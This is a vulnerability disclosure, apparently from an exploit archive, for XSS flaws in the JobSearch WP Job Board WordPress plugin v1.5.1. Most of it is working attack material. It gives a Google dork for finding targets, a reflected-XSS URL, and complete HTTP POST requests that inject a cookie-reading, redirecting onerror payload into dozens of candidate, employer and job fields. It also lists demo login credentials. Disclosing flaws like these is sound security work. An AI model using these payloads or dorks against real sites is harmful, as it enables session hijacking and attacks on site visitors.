JobSearch WP Job Board WordPress Plugin v1.5.1 - Multiple Vulnerabilities

2020.07.18
ru Vlad Vector (RU) ru
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79
Dork: inurl:/wp-content/plugins/wp-jobsearch/

[+] Exploit Title: JobSearch WP Job Board WordPress Plugin v1.5.1 - Multiple Vulnerabilities [+] Google Dork: inurl:/wp-content/plugins/wp-jobsearch/ [+] Date: 2020-07-03 [+] Exploit Author: Vlad Vector [ https://vladvector.ru ] [+] Vendor: Eyecix [ http://eyecix.com ] [+] Software Version: 1.5.1 [+] Software Link: https://codecanyon.net/item/jobsearch-wp-job-board-wordpress-plugin/21066856 [+] Tested on: Debian 10 [+] CVE: [+] CWE: CWE-79 ### [ Info: ] [i] An Unauthenticated Reflected & Multiple Authenticated Persistent XSS vulnerabilities was discovered in the JobSearch plugin through 1.5.1 for WordPress. [i] An Authenticated Persistent XSS @ Job Page will trigger on the dashboard area /user-dashboard/?tab=manage-jobs and on the job page itself. [i] Demo account #1 (Candidate): vladvector / DJKNFU#$&H#IUFD (login / password) [i] Demo account #2 (Employer): vladvector2 / DJKNFU#$&H#IUFD (login / password) [i] Candidate Profile URL: https://eyecix.com/plugins/jobsearch/candidate/vladvector/ [i] Employer Profile URL: https://eyecix.com/plugins/jobsearch/employer/vladvector/ [i] Employer Job URL: https://eyecix.com/plugins/jobsearch/job/poc/ ### [ Vulnerabilities: ] [x] Unauthenticated Reflected XSS -> /?location=[payload] [x] Authenticated Persistent XSS -> Candidate Profile (vulnerable fields: Phone, Dial Code, Job Title, Academic Level, Age, Salary, Gender, Industry, Full Address) [x] Authenticated Persistent XSS -> Employer Profile (vulnerable fields: Phone, Dial Code, Founded Since, Member Title, Designation, Experience, Facebook URL, Google+ URL, Twitter URL, LinkedIn URL, Description, Full Address) [x] Authenticated Persistent XSS -> Job Page (vulnerable fields: Offered Salary, Career Level, Experience, Gender, Industry, Qualifications, Job Description, Full Address) ### [ Payload: ] [$] "--><!--<img src="--><img src=x onerror=(alert)(`VLΛDVΞCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"--> ### [ PoC Unauthenticated Reflected XSS: ] [!] https://eyecix.com/plugins/jobsearch/?location=%22%20autofocus%20onfocus%3Dalert%28%60VL%CE%9BDV%CE%9ECTOR%60%29%3Balert%28document.domain%29%3Bwindow.location%3D%60https%3A%2F%2Ftwitter.com%2Fvlad_vector%60%3B%20%22%3E [!] GET /plugins/jobsearch/?location=%22%20autofocus%20onfocus%3Dalert%28%60VL%CE%9BDV%CE%9ECTOR%60%29%3Balert%28document.domain%29%3Bwindow.location%3D%60https%3A%2F%2Ftwitter.com%2Fvlad_vector%60%3B%20%22%3E HTTP/1.1 Host: eyecix.com ### [ PoC Authenticated Persistent XSS -> Candidate User Profile: ] [!] POST /plugins/jobsearch/user-dashboard/?tab=dashboard-settings HTTP/1.1 Host: eyecix.com Content-Type: multipart/form-data; boundary=---------------------------27142012921130118151484572765 Content-Length: 6644 Origin: https://eyecix.com Referer: https://eyecix.com/plugins/jobsearch/user-dashboard/?tab=dashboard-settings Cookie: [cookies_here] -----------------------------27142012921130118151484572765 Content-Disposition: form-data; name="user_cvr_photo_cand"; filename="" Content-Type: application/octet-stream -----------------------------27142012921130118151484572765 Content-Disposition: form-data; name="u_firstname" Vlad -----------------------------27142012921130118151484572765 Content-Disposition: form-data; name="u_lastname" Vector -----------------------------27142012921130118151484572765 Content-Disposition: form-data; name="user_profile_slug" vladvector -----------------------------27142012921130118151484572765 Content-Disposition: form-data; name="jobsearch_field_user_public_pview" yes -----------------------------27142012921130118151484572765 Content-Disposition: form-data; name="jobsearch_field_user_dob_whole" -----------------------------27142012921130118151484572765 Content-Disposition: form-data; name="user_phone" 1337"--><!--<img src="--><img src=x onerror=(alert)(`VLΛDVΞCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"--> -----------------------------27142012921130118151484572765 Content-Disposition: form-data; name="dial_code" 1337"--><!--<img src="--><img src=x onerror=(alert)(`VLΛDVΞCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"--> -----------------------------27142012921130118151484572765 Content-Disposition: form-data; name="contry_iso_code" -----------------------------27142012921130118151484572765 Content-Disposition: form-data; name="user_sector" -----------------------------27142012921130118151484572765 Content-Disposition: form-data; name="jobsearch_field_candidate_jobtitle" 1337"--><!--<img src="--><img src=x onerror=(alert)(`VLΛDVΞCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"--> -----------------------------27142012921130118151484572765 Content-Disposition: form-data; name="candidate_salary_type" type_1 -----------------------------27142012921130118151484572765 Content-Disposition: form-data; name="candidate_salary" -----------------------------27142012921130118151484572765 Content-Disposition: form-data; name="candidate_salary_currency" default -----------------------------27142012921130118151484572765 Content-Disposition: form-data; name="candidate_salary_pos" left -----------------------------27142012921130118151484572765 Content-Disposition: form-data; name="candidate_salary_sep" , -----------------------------27142012921130118151484572765 Content-Disposition: form-data; name="candidate_salary_deci" 2 -----------------------------27142012921130118151484572765 Content-Disposition: form-data; name="user_bio" -----------------------------27142012921130118151484572765 Content-Disposition: form-data; name="academic-level" 1337"--><!--<img src="--><img src=x onerror=(alert)(`VLΛDVΞCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"--> -----------------------------27142012921130118151484572765 Content-Disposition: form-data; name="Age" 1337"--><!--<img src="--><img src=x onerror=(alert)(`VLΛDVΞCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"--> -----------------------------27142012921130118151484572765 Content-Disposition: form-data; name="salary" 1337"--><!--<img src="--><img src=x onerror=(alert)(`VLΛDVΞCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"--> -----------------------------27142012921130118151484572765 Content-Disposition: form-data; name="gender" 1337"--><!--<img src="--><img src=x onerror=(alert)(`VLΛDVΞCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"--> -----------------------------27142012921130118151484572765 Content-Disposition: form-data; name="industry" 1337"--><!--<img src="--><img src=x onerror=(alert)(`VLΛDVΞCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"--> -----------------------------27142012921130118151484572765 Content-Disposition: form-data; name="cand_user_facebook_url" -----------------------------27142012921130118151484572765 Content-Disposition: form-data; name="cand_user_twitter_url" -----------------------------27142012921130118151484572765 Content-Disposition: form-data; name="cand_user_linkedin_url" -----------------------------27142012921130118151484572765 Content-Disposition: form-data; name="cand_user_dribbble_url" -----------------------------27142012921130118151484572765 Content-Disposition: form-data; name="jobsearch_field_location_location1" -----------------------------27142012921130118151484572765 Content-Disposition: form-data; name="jobsearch_field_location_location2" -----------------------------27142012921130118151484572765 Content-Disposition: form-data; name="jobsearch_field_location_location3" -----------------------------27142012921130118151484572765 Content-Disposition: form-data; name="jobsearch_field_location_address" 1337"--><!--<img src="--><img src=x onerror=(alert)(`VLΛDVΞCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"--> -----------------------------27142012921130118151484572765 Content-Disposition: form-data; name="jobsearch_field_location_lat" -----------------------------27142012921130118151484572765 Content-Disposition: form-data; name="jobsearch_field_location_lng" -----------------------------27142012921130118151484572765 Content-Disposition: form-data; name="jobsearch_field_location_zoom" -----------------------------27142012921130118151484572765 Content-Disposition: form-data; name="user_settings_form" 1 -----------------------------27142012921130118151484572765-- ### [ PoC Authenticated Persistent XSS -> Employer User Profile: ] [!] POST /plugins/jobsearch/user-dashboard/?tab=dashboard-settings HTTP/1.1 Host: eyecix.com Content-Type: multipart/form-data; boundary=---------------------------321608141216835281602774802175 Content-Length: 6868 Origin: https://eyecix.com Referer: https://eyecix.com/plugins/jobsearch/user-dashboard/?tab=dashboard-settings Cookie: [cookies_here] -----------------------------321608141216835281602774802175 Content-Disposition: form-data; name="user_cvr_photo"; filename="" Content-Type: application/octet-stream -----------------------------321608141216835281602774802175 Content-Disposition: form-data; name="u_firstname" Vlad -----------------------------321608141216835281602774802175 Content-Disposition: form-data; name="u_lastname" Vector -----------------------------321608141216835281602774802175 Content-Disposition: form-data; name="display_name" PoC -----------------------------321608141216835281602774802175 Content-Disposition: form-data; name="user_profile_slug" vladvector -----------------------------321608141216835281602774802175 Content-Disposition: form-data; name="jobsearch_field_user_public_pview" yes -----------------------------321608141216835281602774802175 Content-Disposition: form-data; name="user_phone" "--><!--<img src="--><img src=x onerror=(alert)(`VL?DV?CTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"--> -----------------------------321608141216835281602774802175 Content-Disposition: form-data; name="dial_code" "--><!--<img src="--><img src=x onerror=(alert)(`VL?DV?CTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"--> -----------------------------321608141216835281602774802175 Content-Disposition: form-data; name="contry_iso_code" -----------------------------321608141216835281602774802175 Content-Disposition: form-data; name="user_website" -----------------------------321608141216835281602774802175 Content-Disposition: form-data; name="user_sector" -----------------------------321608141216835281602774802175 Content-Disposition: form-data; name="user_dob_mm" 1 -----------------------------321608141216835281602774802175 Content-Disposition: form-data; name="user_dob_dd" 1 -----------------------------321608141216835281602774802175 Content-Disposition: form-data; name="user_dob_yy" 1900 -----------------------------321608141216835281602774802175 Content-Disposition: form-data; name="user_bio" -----------------------------321608141216835281602774802175 Content-Disposition: form-data; name="founded-since" "--><!--<img src="--><img src=x onerror=(alert)(`VL?DV?CTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"--> -----------------------------321608141216835281602774802175 Content-Disposition: form-data; name="emp_user_facebook_url" -----------------------------321608141216835281602774802175 Content-Disposition: form-data; name="emp_user_twitter_url" -----------------------------321608141216835281602774802175 Content-Disposition: form-data; name="emp_user_linkedin_url" -----------------------------321608141216835281602774802175 Content-Disposition: form-data; name="emp_user_dribbble_url" -----------------------------321608141216835281602774802175 Content-Disposition: form-data; name="jobsearch_field_location_location1" -----------------------------321608141216835281602774802175 Content-Disposition: form-data; name="jobsearch_field_location_location2" -----------------------------321608141216835281602774802175 Content-Disposition: form-data; name="jobsearch_field_location_location3" -----------------------------321608141216835281602774802175 Content-Disposition: form-data; name="jobsearch_field_location_address" "--><!--<img src="--><img src=x onerror=(alert)(`VL?DV?CTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"--> -----------------------------321608141216835281602774802175 Content-Disposition: form-data; name="jobsearch_field_location_lat" 37.090240 -----------------------------321608141216835281602774802175 Content-Disposition: form-data; name="jobsearch_field_location_lng" -95.712891 -----------------------------321608141216835281602774802175 Content-Disposition: form-data; name="jobsearch_field_location_zoom" 12 -----------------------------321608141216835281602774802175 Content-Disposition: form-data; name="team_image"; filename="" Content-Type: application/octet-stream -----------------------------321608141216835281602774802175 Content-Disposition: form-data; name="jobsearch_field_team_title[]" "--><!--<img src="--><img src=x onerror=(alert)(`VL?DV?CTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"--> -----------------------------321608141216835281602774802175 Content-Disposition: form-data; name="jobsearch_field_team_designation[]" "--><!--<img src="--><img src=x onerror=(alert)(`VL?DV?CTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"--> -----------------------------321608141216835281602774802175 Content-Disposition: form-data; name="jobsearch_field_team_experience[]" "--><!--<img src="--><img src=x onerror=(alert)(`VL?DV?CTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"--> -----------------------------321608141216835281602774802175 Content-Disposition: form-data; name="team_image"; filename="" Content-Type: application/octet-stream -----------------------------321608141216835281602774802175 Content-Disposition: form-data; name="jobsearch_field_team_image[]" -----------------------------321608141216835281602774802175 Content-Disposition: form-data; name="jobsearch_field_team_facebook[]" "--><!--<img src="--><img src=x onerror=(alert)(`VL?DV?CTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"--> -----------------------------321608141216835281602774802175 Content-Disposition: form-data; name="jobsearch_field_team_google[]" "--><!--<img src="--><img src=x onerror=(alert)(`VL?DV?CTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"--> -----------------------------321608141216835281602774802175 Content-Disposition: form-data; name="jobsearch_field_team_twitter[]" "--><!--<img src="--><img src=x onerror=(alert)(`VL?DV?CTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"--> -----------------------------321608141216835281602774802175 Content-Disposition: form-data; name="jobsearch_field_team_linkedin[]" "--><!--<img src="--><img src=x onerror=(alert)(`VL?DV?CTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"--> -----------------------------321608141216835281602774802175 Content-Disposition: form-data; name="jobsearch_field_team_description[]" "--><!--<img src="--><img src=x onerror=(alert)(`VL?DV?CTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"--> -----------------------------321608141216835281602774802175 Content-Disposition: form-data; name="user_settings_form" 1 -----------------------------321608141216835281602774802175-- ### [ PoC Authenticated Persistent XSS -> Job Page: ] [!] POST /plugins/jobsearch/post-new-jobs/ HTTP/1.1 Host: eyecix.com Content-Type: multipart/form-data; boundary=---------------------------35378657672420857749655614298 Content-Length: 5216 Origin: https://eyecix.com Referer: https://eyecix.com/plugins/jobsearch/post-new-jobs/ Cookie: [cookies_here] -----------------------------35378657672420857749655614298 Content-Disposition: form-data; name="job_title" PoC -----------------------------35378657672420857749655614298 Content-Disposition: form-data; name="job_detail" 1337"--><!--<img src="--><img src=x onerror=(alert)(`VL?DV?CTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"--> -----------------------------35378657672420857749655614298 Content-Disposition: form-data; name="application_deadline" -----------------------------35378657672420857749655614298 Content-Disposition: form-data; name="job_sector" 12 -----------------------------35378657672420857749655614298 Content-Disposition: form-data; name="job_type" 4 -----------------------------35378657672420857749655614298 Content-Disposition: form-data; name="get_job_skills[]" poc -----------------------------35378657672420857749655614298 Content-Disposition: form-data; name="job_apply_type" internal -----------------------------35378657672420857749655614298 Content-Disposition: form-data; name="job_apply_url" -----------------------------35378657672420857749655614298 Content-Disposition: form-data; name="job_apply_email" -----------------------------35378657672420857749655614298 Content-Disposition: form-data; name="job_salary_type" type_1 -----------------------------35378657672420857749655614298 Content-Disposition: form-data; name="job_salary" "--><!--<img src="--><img src=x onerror=(alert)(`VL?DV?CTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"--> -----------------------------35378657672420857749655614298 Content-Disposition: form-data; name="job_max_salary" -----------------------------35378657672420857749655614298 Content-Disposition: form-data; name="job_salary_currency" default -----------------------------35378657672420857749655614298 Content-Disposition: form-data; name="job_salary_pos" left -----------------------------35378657672420857749655614298 Content-Disposition: form-data; name="job_salary_sep" , -----------------------------35378657672420857749655614298 Content-Disposition: form-data; name="job_salary_deci" 2 -----------------------------35378657672420857749655614298 Content-Disposition: form-data; name="offered-salary" 31337"--><!--<img src="--><img src=x onerror=(alert)(`VL?DV?CTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"--> -----------------------------35378657672420857749655614298 Content-Disposition: form-data; name="career-level" "--><!--<img src="--><img src=x onerror=(alert)(`VL?DV?CTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"--> -----------------------------35378657672420857749655614298 Content-Disposition: form-data; name="experience" 4-years"--><!--<img src="--><img src=x onerror=(alert)(`VL?DV?CTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"--> -----------------------------35378657672420857749655614298 Content-Disposition: form-data; name="gender" male"--><!--<img src="--><img src=x onerror=(alert)(`VL?DV?CTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"--> -----------------------------35378657672420857749655614298 Content-Disposition: form-data; name="Industry" graphics-designing"--><!--<img src="--><img src=x onerror=(alert)(`VL?DV?CTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"--> -----------------------------35378657672420857749655614298 Content-Disposition: form-data; name="qualifications" masters-degree"--><!--<img src="--><img src=x onerror=(alert)(`VL?DV?CTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"--> -----------------------------35378657672420857749655614298 Content-Disposition: form-data; name="job_attach_files[]"; filename="" Content-Type: application/octet-stream -----------------------------35378657672420857749655614298 Content-Disposition: form-data; name="jobsearch_field_location_location1" -----------------------------35378657672420857749655614298 Content-Disposition: form-data; name="jobsearch_field_location_location2" -----------------------------35378657672420857749655614298 Content-Disposition: form-data; name="jobsearch_field_location_location3" -----------------------------35378657672420857749655614298 Content-Disposition: form-data; name="jobsearch_field_location_address" "--><!--<img src="--><img src=x onerror=(alert)(`VL?DV?CTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"--> -----------------------------35378657672420857749655614298 Content-Disposition: form-data; name="jobsearch_field_location_lat" -----------------------------35378657672420857749655614298 Content-Disposition: form-data; name="jobsearch_field_location_lng" -----------------------------35378657672420857749655614298 Content-Disposition: form-data; name="jobsearch_field_location_zoom" -----------------------------35378657672420857749655614298 Content-Disposition: form-data; name="user_job_posting" 1 -----------------------------35378657672420857749655614298-- ### [ Contacts: ] [#] Website: vladvector.ru [#] Telegram: @vladvector [#] Twitter: @vlad_vector [#] GitHub: @vladvector

References:

https://github.com/vladvector/vladvector.github.io/blob/master/exploit/2020-07-03-jobsearch-wp-job-board-wordpress-plugin-v1-5-1.txt
https://codecanyon.net/item/jobsearch-wp-job-board-wordpress-plugin/21066856


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top